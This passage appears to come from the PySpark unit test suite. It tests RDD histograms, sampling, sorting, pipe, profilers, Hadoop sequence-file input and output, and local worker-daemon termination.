rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two buckets and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without buckets, no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# a further Python <-> Java RDD conversion used to throw exceptions (SPARK-5361)
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertIn(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertIn(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertIn(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
